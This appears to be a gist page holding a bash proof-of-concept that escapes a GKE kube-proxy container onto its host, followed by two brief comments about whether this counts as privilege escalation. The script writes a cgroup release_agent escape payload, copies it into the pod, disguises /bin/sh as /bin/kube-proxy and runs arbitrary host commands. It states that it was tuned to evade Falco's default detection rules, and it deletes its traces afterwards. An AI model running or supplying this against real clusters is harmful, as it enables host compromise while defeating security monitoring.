GKE/Kube-proxy host command execution via kubectl exec

kphcme.sh

#!/usr/bin/env bash

# Credit: https://twitter.com/_fel1x
#         poc: https://twitter.com/_fel1x/status/1151487051986087936
# Adapted to GKE/kube-proxy by: https://twitter.com/bradgeesaman
#         and to avoid detection by Falco's default rules


read -r -d '' ESCAPE <<'EOF'
#!/bin/sh
d=`dirname $(ls -x /s*/fs/c*/*/r* |head -n1)`
mkdir -p $d/w;echo 1 >$d/w/notify_on_release
t=`sed -n 's/.*\upperdir=\([^,]*\).*/\1/p' /etc/mtab | head -n1`
touch /tmp/o; echo $t/tmp/c >$d/release_agent;echo "#!/bin/sh
$1 >$t/tmp/o" >/tmp/c;chmod +x /tmp/c;sh -c "echo 0 >$d/w/cgroup.procs";sleep 1;cat /tmp/o
rm -f /tmp/o;rm -f /tmp/c;rm -f /tmp/run; rm -f /bin/kube-proxy
EOF

ESC_FILE="escape.sh"
echo -n "${ESCAPE}" > "${ESC_FILE}"
chmod +x "${ESC_FILE}"
CMD="${1-docker ps}"
KUBE_PROXY_POD_NAME="$(kubectl get pod -n kube-system -l 'component=kube-proxy,tier=node' -o=jsonpath='{.items[].metadata.name}')"
kubectl cp -n kube-system "${ESC_FILE}" "${KUBE_PROXY_POD_NAME}":/tmp/run
kubectl exec -it -n kube-system "${KUBE_PROXY_POD_NAME}" -- ln -s /bin/sh /bin/kube-proxy
kubectl exec -it -n kube-system "${KUBE_PROXY_POD_NAME}" -- /bin/kube-proxy -c "/tmp/run \"$CMD\""

Glad to help! Just one tweak to the phrasing "perform privilege escalation" -- Because the container and process are already "root", there is no "privilege escalation" per se. Just a handy shortcut using the tools already existing inside the current container to do useful "root" things.

Perfect. Gotcha!